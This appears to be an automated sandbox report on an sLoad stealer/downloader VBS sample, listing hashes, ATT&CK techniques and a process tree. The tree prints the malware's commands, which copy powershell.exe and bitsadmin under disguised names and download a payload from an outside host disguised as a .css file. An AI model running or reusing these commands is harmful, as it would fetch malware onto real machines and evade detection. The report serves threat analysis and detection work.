sload | 23f49debee62d2ea96d91c2cf8c68e7f4bb16827696e4586b3e979be84bca631

General

Target

23f49debee62d2ea96d91c2cf8c68e7f4bb16827696e4586b3e979be84bca631.vbs
Size

6KB
MD5

31f505685ab56e105729d6a60a7a6984
SHA1

1f6fb6b55cd9fbd42b0ca0ec5f8227d9f6973255
SHA256

23f49debee62d2ea96d91c2cf8c68e7f4bb16827696e4586b3e979be84bca631
SHA512

b1baaf13e79f3ef6000510ff4c2e90373105b7a8ffd53b3f9b06e2ae824c562f9e287e5319f2699a331de10717d65775307fb1e006b3d14d19cb82b5a39d119d

Score

10^/10

sload stealer trojan

Malware Config

Signatures

sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload

Executes dropped EXE 1 IoCs

pid	Process
4648	YVxNfVgin.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-157025953-3125636059-437143553-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 4636 wrote to memory of 504	4636	WScript.exe	78
PID 4636 wrote to memory of 504	4636	WScript.exe	78
PID 504 wrote to memory of 1580	504	cmd.exe	80
PID 504 wrote to memory of 1580	504	cmd.exe	80
PID 504 wrote to memory of 1904	504	cmd.exe	81
PID 504 wrote to memory of 1904	504	cmd.exe	81
PID 4636 wrote to memory of 4648	4636	WScript.exe	82
PID 4636 wrote to memory of 4648	4636	WScript.exe	82
PID 4636 wrote to memory of 4648	4636	WScript.exe	82

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23f49debee62d2ea96d91c2cf8c68e7f4bb16827696e4586b3e979be84bca631.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4636
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\ztAXz.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\YVxNfVg*.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:504
- - C:\Windows\system32\cmd.exe
    cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\ztAXz.exe
    3⤵
    PID:1580
- - C:\Windows\system32\cmd.exe
    cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\YVxNfVg*.exe
    3⤵
    PID:1904
- C:\ProgramData\YVxNfVgin.exe
  "C:\ProgramData\YVxNfVgin.exe" /transfer HYlQgP /download https://fhivelifestyle.online/lidepato/MLIMNT54C54F979H/1x1.css C:\Users\Admin\AppData\Roaming\1x1.css
  2⤵
  - Executes dropped EXE
  PID:4648

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\YVxNfVgin.exe

Filesize
182KB

MD5
f57a03fa0e654b393bb078d1c60695f3

SHA1
1ced6636bd2462c0f1b64775e1981d22ae57af0b

SHA256
c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

SHA512
7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

Download Submit
C:\ProgramData\YVxNfVgin.exe

Filesize
182KB

MD5
f57a03fa0e654b393bb078d1c60695f3

SHA1
1ced6636bd2462c0f1b64775e1981d22ae57af0b

SHA256
c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

SHA512
7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

Download Submit

Analysis

Sharing